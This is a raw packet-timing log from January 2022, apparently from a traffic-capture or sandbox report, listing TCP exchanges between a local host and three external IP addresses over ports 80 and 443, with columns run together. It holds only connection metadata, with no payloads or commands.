                                                                                                                                  Jan 28, 2022 21:04:52.592844009 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592850924 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592911005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592999935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.593004942 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.593041897 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.593046904 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595520020 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595552921 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595582008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595608950 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595608950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595628023 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595639944 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595665932 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595676899 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595694065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595721006 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595729113 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595747948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595773935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595782042 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595801115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595834970 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595853090 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597094059 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597161055 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597307920 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597337008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597363949 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597379923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597389936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597419977 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597429991 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597450972 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597476959 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597486973 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597503901 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597531080 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597538948 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597558975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597585917 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597594976 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597613096 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597639084 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597649097 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597667933 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597693920 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597702980 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597721100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597748041 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597754955 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597775936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597803116 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597811937 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597830057 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597866058 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597872972 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597903013 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597929001 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597937107 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597956896 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597982883 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597991943 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.598011017 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598037004 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598046064 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.598066092 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598090887 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598098993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.598118067 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598145008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.598153114 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.626818895 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.673770905 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854804039 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854832888 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854856014 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854866028 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.854878902 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854903936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854912043 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.854927063 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.854948044 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.968169928 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:52.968216896 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.968278885 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:52.980869055 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:52.980904102 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.066950083 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:53.272907972 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.272989988 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.285604000 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.285629988 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.286041021 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.493872881 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.493957043 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.618272066 CET8049167103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.618343115 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:53.623415947 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.665874004 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.944691896 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.944732904 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.944842100 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.944869995 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.945745945 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:53.945825100 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:53.945841074 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.047106981 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:54.079035997 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.079267025 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.079294920 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.212027073 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.212050915 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.212110996 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.212265968 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.212291002 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.213363886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.213382006 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.213417053 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.213475943 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.213491917 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.213557959 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.345268965 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.345294952 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.345330954 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.345557928 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.346471071 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.346491098 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.346525908 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.346599102 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.346839905 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.347709894 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.347727060 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.347759008 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.347837925 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.347858906 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.478147984 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.478163958 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.478342056 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.478372097 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.478406906 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.479350090 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.479362965 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.479448080 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.479521990 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.479541063 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.480510950 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480532885 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480624914 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480632067 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480681896 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480705976 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.480770111 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.480794907 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.480840921 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.481682062 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.481689930 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.481777906 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.481806040 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613296986 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613312006 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613450050 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613544941 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613557100 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613687992 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.613770962 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.613795996 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.613809109 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.614396095 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.614408970 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.614449024 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.614617109 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.614661932 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.614681005 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.615945101 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.615962982 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.615992069 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616063118 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616075993 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616103888 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.616192102 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616233110 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616266012 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.616307020 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.616549969 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616563082 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616591930 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.616678953 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.616700888 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.617383003 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.747665882 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.747684002 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.747733116 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.748029947 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.748311996 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.748332024 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.748398066 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.748429060 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.748464108 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.749267101 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.749283075 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.749406099 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.749444008 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.749456882 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.749540091 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.749557972 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.749938965 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.750019073 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.750042915 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.750046015 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.750097036 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.750111103 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.750127077 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.750144005 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.750175953 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.750328064 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.752027988 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.752130985 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.752161980 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.752177000 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.752202988 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.752213955 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.752301931 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.752319098 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.752921104 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.881781101 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882008076 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.882047892 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882081985 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882170916 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.882174969 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882191896 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882266045 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.882282019 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882313967 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882390022 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.882405996 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882464886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882550001 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.882565975 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.882982969 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883100986 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883119106 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883383989 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883483887 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883497953 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883543968 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883565903 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883690119 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883706093 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883735895 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883862019 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883883953 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.884037018 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.884181976 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.884200096 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885268927 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885404110 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.885420084 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885449886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885590076 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.885607004 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886579037 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.886585951 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886656046 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886748075 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.886831045 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886948109 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887046099 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887063026 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.887080908 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887216091 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.889983892 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.014722109 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.014925003 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015019894 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015063047 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015088081 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015096903 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015402079 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015541077 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015562057 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015665054 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015782118 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015796900 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015980959 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016141891 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016304970 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016413927 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016546965 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016558886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016648054 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016767025 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016781092 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016822100 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016933918 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016944885 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017044067 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017111063 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017239094 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017251015 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017333031 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017563105 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017671108 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017674923 CET49169443192.168.2.22162.241.211.118
